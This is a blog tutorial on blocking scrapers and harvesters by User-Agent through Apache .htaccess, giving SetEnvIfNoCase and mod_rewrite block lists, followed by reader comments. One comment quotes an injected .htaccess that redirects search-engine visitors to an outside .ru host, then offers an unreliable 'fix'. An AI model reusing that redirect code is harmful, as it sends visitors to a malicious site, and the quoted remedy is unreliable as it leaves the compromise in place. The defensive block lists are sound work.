Block Bad robots, spiders, crawlers and harvesters
There are lots of examples across the internet that use mod_rewrite, and we provide one below as well. But what can you do when mod_rewrite is not available? You can use the SetEnvIfNoCase directive (from mod_setenvif) in combination with FilesMatch.
SetEnvIfNoCase user-agent "^BlackWidow" bad_bot=1
SetEnvIfNoCase user-agent "^Bot\ mailto:craftbot@yahoo.com" bad_bot=1
SetEnvIfNoCase user-agent "^ChinaClaw" bad_bot=1
SetEnvIfNoCase user-agent "^Custo" bad_bot=1
SetEnvIfNoCase user-agent "^DISCo" bad_bot=1
SetEnvIfNoCase user-agent "^Download\ Demon" bad_bot=1
SetEnvIfNoCase user-agent "^eCatch" bad_bot=1
SetEnvIfNoCase user-agent "^EirGrabber" bad_bot=1
SetEnvIfNoCase user-agent "^EmailSiphon" bad_bot=1
SetEnvIfNoCase user-agent "^EmailWolf" bad_bot=1
SetEnvIfNoCase user-agent "^Express\ WebPictures" bad_bot=1
SetEnvIfNoCase user-agent "^ExtractorPro" bad_bot=1
SetEnvIfNoCase user-agent "^EyeNetIE" bad_bot=1
SetEnvIfNoCase user-agent "^FlashGet" bad_bot=1
SetEnvIfNoCase user-agent "^GetRight" bad_bot=1
SetEnvIfNoCase user-agent "^GetWeb!" bad_bot=1
SetEnvIfNoCase user-agent "^Go!Zilla" bad_bot=1
SetEnvIfNoCase user-agent "^Go-Ahead-Got-It" bad_bot=1
SetEnvIfNoCase user-agent "^GrabNet" bad_bot=1
SetEnvIfNoCase user-agent "^Grafula" bad_bot=1
SetEnvIfNoCase user-agent "^HMView" bad_bot=1
SetEnvIfNoCase user-agent "HTTrack" bad_bot=1
SetEnvIfNoCase user-agent "^Image\ Stripper" bad_bot=1
SetEnvIfNoCase user-agent "^Image\ Sucker" bad_bot=1
SetEnvIfNoCase user-agent "Indy\ Library" bad_bot=1
SetEnvIfNoCase user-agent "^InterGET" bad_bot=1
SetEnvIfNoCase user-agent "^Internet\ Ninja" bad_bot=1
SetEnvIfNoCase user-agent "^JetCar" bad_bot=1
SetEnvIfNoCase user-agent "^JOC\ Web\ Spider" bad_bot=1
SetEnvIfNoCase user-agent "^larbin" bad_bot=1
SetEnvIfNoCase user-agent "^LeechFTP" bad_bot=1
SetEnvIfNoCase user-agent "^Mass\ Downloader" bad_bot=1
SetEnvIfNoCase user-agent "^MIDown\ tool" bad_bot=1
SetEnvIfNoCase user-agent "^Mister\ PiX" bad_bot=1
SetEnvIfNoCase user-agent "^Navroad" bad_bot=1
SetEnvIfNoCase user-agent "^NearSite" bad_bot=1
SetEnvIfNoCase user-agent "^NetAnts" bad_bot=1
SetEnvIfNoCase user-agent "^NetSpider" bad_bot=1
SetEnvIfNoCase user-agent "^Net\ Vampire" bad_bot=1
SetEnvIfNoCase user-agent "^NetZIP" bad_bot=1
SetEnvIfNoCase user-agent "^Octopus" bad_bot=1
SetEnvIfNoCase user-agent "^Offline\ Explorer" bad_bot=1
SetEnvIfNoCase user-agent "^Offline\ Navigator" bad_bot=1
SetEnvIfNoCase user-agent "^PageGrabber" bad_bot=1
SetEnvIfNoCase user-agent "^Papa\ Foto" bad_bot=1
SetEnvIfNoCase user-agent "^pavuk" bad_bot=1
SetEnvIfNoCase user-agent "^pcBrowser" bad_bot=1
SetEnvIfNoCase user-agent "^RealDownload" bad_bot=1
SetEnvIfNoCase user-agent "^ReGet" bad_bot=1
SetEnvIfNoCase user-agent "^SiteSnagger" bad_bot=1
SetEnvIfNoCase user-agent "^SmartDownload" bad_bot=1
SetEnvIfNoCase user-agent "^SuperBot" bad_bot=1
SetEnvIfNoCase user-agent "^SuperHTTP" bad_bot=1
SetEnvIfNoCase user-agent "^Surfbot" bad_bot=1
SetEnvIfNoCase user-agent "^tAkeOut" bad_bot=1
SetEnvIfNoCase user-agent "^Teleport\ Pro" bad_bot=1
SetEnvIfNoCase user-agent "^VoidEYE" bad_bot=1
SetEnvIfNoCase user-agent "^Web\ Image\ Collector" bad_bot=1
SetEnvIfNoCase user-agent "^Web\ Sucker" bad_bot=1
SetEnvIfNoCase user-agent "^WebAuto" bad_bot=1
SetEnvIfNoCase user-agent "^WebCopier" bad_bot=1
SetEnvIfNoCase user-agent "^WebFetch" bad_bot=1
SetEnvIfNoCase user-agent "^WebGo\ IS" bad_bot=1
SetEnvIfNoCase user-agent "^WebLeacher" bad_bot=1
SetEnvIfNoCase user-agent "^WebReaper" bad_bot=1
SetEnvIfNoCase user-agent "^WebSauger" bad_bot=1
SetEnvIfNoCase user-agent "^Website\ eXtractor" bad_bot=1
SetEnvIfNoCase user-agent "^Website\ Quester" bad_bot=1
SetEnvIfNoCase user-agent "^WebStripper" bad_bot=1
SetEnvIfNoCase user-agent "^WebWhacker" bad_bot=1
SetEnvIfNoCase user-agent "^WebZIP" bad_bot=1
SetEnvIfNoCase user-agent "^Widow" bad_bot=1
SetEnvIfNoCase user-agent "^WWWOFFLE" bad_bot=1
SetEnvIfNoCase user-agent "^Xaldon\ WebSpider" bad_bot=1
SetEnvIfNoCase user-agent "^Zeus" bad_bot=1
<FilesMatch "(.*)">
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</FilesMatch>
How does it work? If the string or regular expression matches the User-Agent HTTP header, the directive sets the bad_bot environment variable. Then, in the FilesMatch block, we tell the server to deny access (return a 403 Forbidden page) to every user or bot that matched any of the strings above.
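The Order, Allow and Deny directives used above come from Apache 2.2; on Apache 2.4 they are only available through mod_access_compat. A minimal sketch of the same idea with the 2.4 Require syntax might look like the following. It assumes Apache 2.4 with mod_setenvif and mod_authz_core loaded, and it lists only two of the user agents to keep the example short:

```apache
# Flag matching clients; the variable name bad_bot follows the example above.
SetEnvIfNoCase User-Agent "^BlackWidow" bad_bot=1
SetEnvIfNoCase User-Agent "HTTrack" bad_bot=1

# Apache 2.4 only (assumption): allow everyone except flagged clients.
<RequireAll>
    Require all granted
    Require not env bad_bot
</RequireAll>
```

Flagged clients should still receive a 403 Forbidden response; only the access-control syntax differs.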
And of course, here is the mod_rewrite-based example:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.* - [F,L]
What does it do? Each RewriteCond tests the User-Agent header against a string or regular expression. If any of them matches, the RewriteRule returns a 403 Forbidden error page.
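The long chain of [OR] conditions can also be condensed with regular-expression alternation. The sketch below is one possible shorter form, not a replacement for the full list: it covers only a handful of the agents above, and the grouping is an illustrative choice. A pattern that starts with ^ must match at the beginning of the User-Agent header, while a pattern without ^ (as with HTTrack and Indy Library) matches anywhere in it.

```apache
RewriteEngine On
# One alternation replaces several [OR]-chained conditions.
# ^ anchors the match to the start of the User-Agent; [NC] ignores case.
RewriteCond %{HTTP_USER_AGENT} ^(BlackWidow|ChinaClaw|Teleport\ Pro|WebZIP) [NC,OR]
# No ^ here: these names may appear anywhere in the header.
RewriteCond %{HTTP_USER_AGENT} (HTTrack|Indy\ Library) [NC]
# Return 403 Forbidden for any request that matched.
RewriteRule ^ - [F]
```

Adding [NC] to the first condition makes it case-insensitive, which the original anchored conditions are not, so this version blocks slightly more than the list above.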
Comments 21 >>
Just Helping Said,
Dec 03, 2006 @ 01:02
The line ending with "Indy\ Library" [NC,OR] needs a "bad_bot=1" at the end of it.
Nox Said,
Jan 18, 2008 @ 05:42
Awesome - Thanks for the Great Posting
Question: What does this entry do...
(Mail?)
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
Why do HTTrack and Indy not have the ^ symbol?
thx
eligio Said,
Jan 18, 2008 @ 10:46
awesome list! already installed on my game site, hope it work. thanks :D
Dmitry Agafonov Said,
Sep 12, 2009 @ 01:41
Be careful: by blindly copying the list, you can block a lot of perfectly harmless users. For example, FlashGet is a download manager, not a bot. I recommend looking at your server logs, finding the User-Agents of the robots that actually come to your site, and blocking only those. This approach is also useful in terms of load on the server.
Wondering Said,
Oct 18, 2009 @ 00:34
Where do you put this code? In a robot.txt or on the html page?
Cenk Said,
Oct 21, 2009 @ 03:32
Thanks. Great post!
Wondering:
In .htaccess file on the root directory.
ganool Said,
Jan 24, 2010 @ 08:46
GOD..thx buddy,,
u save my VPS..
please update it if there is a new bad bot...
because we know that bad bot can change their http_user_agent
teleport pro Said,
Sep 19, 2010 @ 10:53
After copy/paste the codes to .htaccess in server root i still can use the teleport pro to download all the website contents
enigma1 Said,
Sep 19, 2010 @ 11:30
It's a total waste of time to rely on the user agent header to identify who the client is.
Leaving aside the fact that the various scraping tools let the operator customize the user agent, browsers, firewalls and other installed tools have options for the user to set up the headers any way he likes.
You cannot rely on client headers to identify something. The only reliable field is the remote ip/port
$ip = $_SERVER['REMOTE_ADDR'];
At best you can validate from the headers the intention of the client, whether he wants to enter as a spider or a human, using the user agent. But that's good only for the popular spiders that carry documented signatures. And even that needs to be cross-referenced with the IP.
Ashwini - UnicHost Said,
Dec 25, 2010 @ 15:28
I have already implemented that while working on the project. If anybody wants to go further, you can set up a temporary IP block in the firewall settings for clients making more than 20 requests/sec, or whatever limit your site requires. It helps a lot.
Thanks for sharing.
Ashwini.
Lotto Cheatah Said,
May 22, 2011 @ 11:20
do I need to manually replace the mod_rewrite.c file with the one above for this .htaccess file to work?
James Said,
Aug 19, 2011 @ 15:52
Dude great list. But here I want to mention that there is a website http://foolbots.com with weird concept of passing the bad robots from one website to another website.
Legendofmir Said,
Dec 23, 2011 @ 12:33
I have a huge problem with Apache on WinXP SP3. Everything works fine, but sometimes .htaccess files are created in all the PHP folders. I want to stop these .htaccess files from being made. In which files, and which script, must I enable/disable to stop these files from being created?
This script appears in .htaccess:
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://hereadmin.ru/kernel/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://hereadmin.ru/kernel/index.php [R=301,L]
I blocked this site in ZoneAlarm so it cannot connect to the internet, but I want to disable whatever option creates these files.
Legendofmir Said,
Dec 24, 2011 @ 02:51
Never mind! I fixed it! In Apache's httpd.conf I disabled:
# Satisfy All
Now it's ok!
Merry X-mas to all!!

Great list. Saved my life/bandwidth! :D